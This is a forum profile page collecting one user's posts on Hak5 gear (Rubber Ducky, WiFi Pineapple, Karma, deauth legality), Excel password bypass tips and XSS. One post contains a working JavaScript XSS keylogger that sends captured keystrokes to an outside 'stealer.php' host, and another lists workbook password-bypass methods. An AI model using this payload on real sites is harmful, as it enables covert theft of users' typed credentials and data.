Jump to content

sud0nick

Dedicated Members
  • Posts

    1,056
  • Joined

  • Last visited

  • Days Won

    66

Posts posted by sud0nick

  1. The Rubber Ducky is a Human Interface Device (HID) that types like a keyboard. It is not meant to be used for flash storage and execution of .exe files in the way you seek. I don't know about Twin Duck and it's capabilities so if you think it may work then do some more research. The only way I can think of executing a file is to use the ducky to either download the file first or access it from a flash drive that you insert along with it and execute it via command prompt or PowerShell.

    As far as hiding windows during this process I have used some scripts from DuckToolkit that use keyboard commands to move a window off screen while it's in use. Other than that I don't think there is a way to do what you want with the ducky.

  2. It won't work that way because you need to access it by the IP the router gave to it. There are now two networks involved here. The Pineapple network on 172.16.42.0 and your home network which is most likely 192.168.1.0. Find the IP address assigned to the ethernet interface and you will be able to connect to it while on your home network.

  3. Karma logs fill up quickly. Make sure you point Karma to somewhere on the SD card so it won't crash your system. The default location for the log should be in the /tmp directory so it will not persist between reboots but after about an hour of activity it could log a lot of info. There isn't a lot of internal space on the Pineapple to begin with so once it fills up the behavior can get wonky.

  4. I found this forum through a quick Google search. I have never tried any of these methods but some of them sound like they're worth a shot. (http://community.spiceworks.com/topic/328118-need-to-unlock-a-password-protected-excel-2010-workbook)

    Some of the noteworthy attempts are:

    1. Move it to Linux and open with Open Office. Some people claim it will open without regard to the password. However, since the file is supposed to be encrypted with that password I'm not sure this will work.

    2. If you can open the file but not edit you may be able to use VBA code to brute force the password.

    3. Upload to Google Docs and download as a regular workbook (if you can access it and not edit)

    Many of the users on that forum are claiming the VBA code in one of the posts works perfectly for bypassing the password in 2013 but I would execute it in a VM just to be careful. VBA code can be dangerous if you don't know exactly what it does.

  5. Guys, let's not forget, that a newly purchased MKV does not come with a DEAUTH infusion. You have the option to download the infusion and use it for personal use. Maybe Hak5 should put a disclaimer or something like that prior to downloading an infusion.

    The MKV, could be used for many other things such as an ABS tracker, Pentesting/auditing etc...

    Also, not all of us live in the US. I'm sure there are some/many countries that have no law regarding this.

    Cheers

    PineAP has the ability to deauth although I assume people are using the infusion more.

    I, too, think a disclaimer is unnecessary. Using anything on the Pineapple against a network/device you do not own without proper consent is illegal already.

  6. I did a quick search of the forums but didn't find anything related to this. I came across this page on the FCC's site that states deauth attacks and jamming of WiFi are illegal in the US as of January, 2015. They also state the following:

    In addition, we reiterate that Federal law prohibits the operation, marketing, or sale of any type of jamming equipment, including devices that interfere with Wi-Fi, cellular, or public safety communications. Detailed information about the prohibition against jamming is available on the Commission’s website at http://www.fcc.gov/encyclopedia/jammer-enforcement.

    If you read the example they gave about a Marriott hotel deauthenticating users it appears the FCC doesn't know the different between that and jamming a signal. Of course they added that catch-all statement that any device that interferes with WiFi communications is illegal. Page 2 of that document states that no commercial establishment is allowed to block WiFi communication but the next paragraph down has the quote I posted above. It would appear that using the deauth feature of the Pineapple is now illegal, unless if I'm misinterpreting this.

  7. CSRF, forcing logged in users to change settings to their accounts, DNS rebinding...including popping a shell on a machine...

    What would the environment have to look like in order to accomplish these attacks? The extent of my knowledge in XSS right now is stealing credentials and key logging. Although I can think of other types of attacks I have no idea what the environment would have to look like in order to carry out any of them.

  8. I've recently been looking into XSS attacks and I see how they are useful for gathering cookies from a site but can they be used for anything else? I have a site that is vulnerable to XSS attacks but it doesn't store any cookies. I've used this code to log keystrokes from the site

    <script>
    var keys = '';
     
    document.onkeypress = function(e) {
        var get = window.event ? event : e;
        var key = get.keyCode ? get.keyCode : get.charCode;
        key = String.fromCharCode(key);
        keys += key;
    }
    
    window.setInterval(function(){
        new Image().src = 'http://www.myattacksite.com/stealer.php?c=' + keys;
        keys = '';
    }, 1000);
    </script>
    

    which is really cool but it doesn't return any impressive results without a login form on the page. I guess it would be possible to try and redirect the user to a page that performs a browser based attack, possibly something with Metasploit.

    Have you guys come across any useful XSS attacks that don't involve cookies or keylogging?

  9. The errors it throws out aren't a problem. Like I said before you will need to suppress any output you don't want. Those errors come from the fact that by the time the program gets to those SSIDs the interface has already connected to an AP.

    To receive an IP address use this command

    udhcpc -i wlan1

    I'm currently working on implementing this in my infusion PortalAuth. You will be able to use a DIP switch to scan, connect, check for a portal, automatically clone it, and authenticate without using the interface. You will also be able to use the script solely for connecting and getting an IP on an open AP without the other PortalAuth features.

×
×
  • Create New...